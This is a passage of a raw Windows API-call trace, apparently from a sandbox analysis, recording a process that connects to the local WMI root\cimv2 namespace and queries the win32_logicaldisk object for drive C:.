WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbdf0f0) returned 0x0 [0149.235] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf0f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0149.235] WbemDefPath:IUnknown:Release (This=0xbdf0f0) returned 0x3 [0149.235] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0149.235] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0149.235] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0149.236] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x2 [0149.236] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x1 [0149.236] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0149.236] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0149.236] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6025450) returned 0x0 [0149.236] WbemDefPath:IUnknown:AddRef (This=0x6025450) returned 0x3 [0149.236] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x2 [0149.236] WbemDefPath:IWbemPath:SetText (This=0x6025450, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025450, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetText (in: This=0x6025450, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetText (in: This=0x6025450, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025450, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025450, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025450, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025450, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025450, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0149.236] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0149.236] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0149.236] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0149.236] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0149.236] IUnknown:Release (This=0xb51e34) returned 0x1 [0149.237] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60249e0) returned 0x0 [0149.237] WbemDefPath:IUnknown:QueryInterface (in: This=0x60249e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0149.237] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60249e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60253e0) returned 0x0 [0149.237] WbemDefPath:IUnknown:Release (This=0x60249e0) returned 0x0 [0149.237] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60253e0) returned 0x0 [0149.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0149.238] WbemDefPath:IUnknown:AddRef (This=0x60253e0) returned 0x3 [0149.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0149.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0149.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbdf110) returned 0x0 [0149.238] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf110, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0149.238] WbemDefPath:IUnknown:Release (This=0xbdf110) returned 0x3 [0149.238] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0149.238] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0149.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0149.238] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x2 [0149.238] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x1 [0149.238] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0149.238] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0149.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x60253e0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60253e0) returned 0x0 [0149.238] WbemDefPath:IUnknown:AddRef (This=0x60253e0) returned 0x3 [0149.238] WbemDefPath:IUnknown:Release (This=0x60253e0) returned 0x2 [0149.238] WbemDefPath:IWbemPath:SetText (This=0x60253e0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0149.238] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60253e0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0149.238] WbemDefPath:IWbemPath:GetText (in: This=0x60253e0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0149.238] WbemDefPath:IWbemPath:GetText (in: This=0x60253e0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0149.238] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0149.238] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0149.239] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0149.239] IUnknown:Release (This=0xb51e34) returned 0x1 [0149.239] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x602b618) returned 0x0 [0149.239] WbemLocator:IUnknown:QueryInterface (in: This=0x602b618, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0149.239] WbemLocator:IClassFactory:CreateInstance (in: This=0x602b618, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x60249f0) returned 0x0 [0149.239] WbemLocator:IUnknown:Release (This=0x602b618) returned 0x0 [0149.239] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x60249f0) returned 0x0 [0149.239] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0149.240] WbemLocator:IUnknown:AddRef (This=0x60249f0) returned 0x3 [0149.240] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0149.240] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0149.240] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0149.240] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0149.240] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0149.240] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0149.240] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x2 [0149.240] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x1 [0149.240] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0149.240] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0149.240] WbemLocator:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x60249f0) returned 0x0 [0149.240] WbemLocator:IUnknown:AddRef (This=0x60249f0) returned 0x3 [0149.240] WbemLocator:IUnknown:Release (This=0x60249f0) returned 0x2 [0149.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60253e0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0149.240] WbemDefPath:IWbemPath:GetText (in: This=0x60253e0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0149.240] WbemDefPath:IWbemPath:GetText (in: This=0x60253e0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0149.240] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6024a00) returned 0x0 [0149.240] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024a00, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x6010c64) returned 0x0 [0150.485] WbemLocator:IUnknown:QueryInterface (in: This=0x6010c64, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b044) returned 0x0 [0150.485] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b044, pProxy=0x6010c64, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0150.485] WbemLocator:IUnknown:Release (This=0xb5b044) returned 0x1 [0150.485] WbemLocator:IUnknown:QueryInterface (in: This=0x6010c64, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b064) returned 0x0 [0150.485] WbemLocator:IUnknown:QueryInterface (in: This=0x6010c64, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b044) returned 0x0 [0150.485] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b044, pProxy=0x6010c64, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0150.485] WbemLocator:IUnknown:Release (This=0xb5b044) returned 0x2 [0150.485] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x1 [0150.486] CoTaskMemFree (pv=0xbd4a08) [0150.486] WbemLocator:IUnknown:Release (This=0x6024a00) returned 0x0 [0150.486] WbemLocator:IUnknown:QueryInterface (in: This=0x6010c64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b064) returned 0x0 [0150.486] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0150.486] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0150.487] WbemLocator:IUnknown:AddRef (This=0xb5b064) returned 0x3 [0150.487] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0150.487] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0150.488] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5afc4) returned 0x0 [0150.488] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5afc4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0150.488] WbemLocator:IUnknown:Release (This=0xb5afc4) returned 0x3 [0150.488] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0150.488] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0150.488] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b04c) returned 0x0 [0150.488] WbemLocator:IRpcOptions:Query (in: This=0xb5b04c, pPrx=0xb5b064, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0150.488] WbemLocator:IUnknown:Release (This=0xb5b04c) returned 0x3 [0150.488] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x2 [0150.488] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0150.488] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0150.488] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x6010c64) returned 0x0 [0150.488] WbemLocator:IUnknown:AddRef (This=0x6010c64) returned 0x4 [0150.488] WbemLocator:IUnknown:Release (This=0x6010c64) returned 0x3 [0150.488] WbemLocator:IUnknown:Release (This=0x6010c64) returned 0x2 [0150.488] SysStringLen (param_1=0x0) returned 0x0 [0150.488] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025450, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0150.488] WbemDefPath:IWbemPath:GetText (in: This=0x6025450, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0150.489] WbemDefPath:IWbemPath:GetText (in: This=0x6025450, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.489] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0150.489] WbemLocator:IUnknown:AddRef (This=0xb5b064) returned 0x3 [0150.489] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b064) returned 0x0 [0150.489] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x3 [0150.489] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x2 [0150.489] WbemDefPath:IWbemPath:GetText (in: This=0x6025450, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0150.489] WbemDefPath:IWbemPath:GetText (in: This=0x6025450, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0150.489] IWbemServices:GetObject (in: This=0x6010c64, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x60284b0, ppCallResult=0x0) returned 0x0 [0150.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60253e0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0150.799] WbemDefPath:IWbemPath:GetText (in: This=0x60253e0, 